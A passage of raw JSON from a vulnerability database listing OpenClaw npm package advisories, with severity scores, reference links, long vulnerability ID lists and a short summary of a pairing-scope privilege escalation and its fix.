elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:56:56Z/"}],"url":"https://github.com/openclaw/openclaw/commit/88aee9161e0e6d32e810a25711e32a808a1777b2"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:56:56Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-in-microsoft-teams-plugin-via-route-allowlist-configuration"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506","reference_id":"CVE-2026-34506","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34506"},{"reference_url":"https://github.com/advisories/GHSA-g7cr-9h7q-4qxq","reference_id":"GHSA-g7cr-9h7q-4qxq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g7cr-9h7q-4qxq"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq","reference_id":"GHSA-g7cr-9h7q-4qxq","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{
"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:56:56Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g7cr-9h7q-4qxq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74859?format=json","purl":"pkg:npm/openclaw@2026.3.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnera
bility":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-54mc-t5s7-wyes"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnera
bility":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnera
bility":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-dbay"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-hzbt-fbgp-h7fd"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k7fe-dqzc-kbcm"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcba-tshp-77d6"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kh5u-hg46-3qha"},{"vulnerability":"VCID-kthe-sgfb-kkb2"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mkka-hf2q-pfhp"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnera
bility":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-njsr-j7vm-cqg8"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-nzu6-7a1g-4kf2"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-p984-bgmq-zqc9"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q38j-b9g9-8yar"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qhr2-jktm-uycx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-qr66-xgea-tufh"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkjm-wcmt-43br"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnera
bility":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnera
bility":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.8"}],"aliases":["CVE-2026-34506","GHSA-g7cr-9h7q-4qxq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ebwd-3xp4-7fdp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91021?format=json","vulnerability_id":"VCID-eda1-pnhb-bqes","summary":"OpenClaw Gateway: RCE and Privilege Escalation from operator.pairing to operator.admin via device.pair.approve\n## Summary\ndevice.pair.approve allowed an operator.pairing approver to approve a pending device request for broader operator scopes than the approver 
actually held.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `fc2d29ea926f47c428c556e92ec981441228d2a4`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/gateway/server-methods/devices.ts now threads caller scopes into device.pair.approve.\n- src/infra/device-pairing.ts now rejects requested operator scopes that exceed the approver-held operator scope set.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35639","reference_id":"","reference_type":"","scores":[{"value":"0.00309","scoring_system":"epss","scoring_elements":"0.54421","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00309","scoring_system":"epss","scoring_elements":"0.54431","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00309","scoring_system":"epss","scoring_elements":"0.5442","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35639"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/
SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://github.com/openclaw/openclaw/commit/fc2d29ea926f47c428c556e92ec981441228d2a4"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/202
6-04-14T03:10:46Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-hf68-49fm-59cq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639","reference_id":"","reference_type":"","scores":[{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35639"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-14T03:10:46Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-device-pair-approve-scope-validation"},{"reference_url":"https://github.com/advisories/GHSA-hf68-49fm-59cq","reference_id":"GHSA-hf68-49fm-59cq","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-hf68-49fm-59cq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulner
ability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulne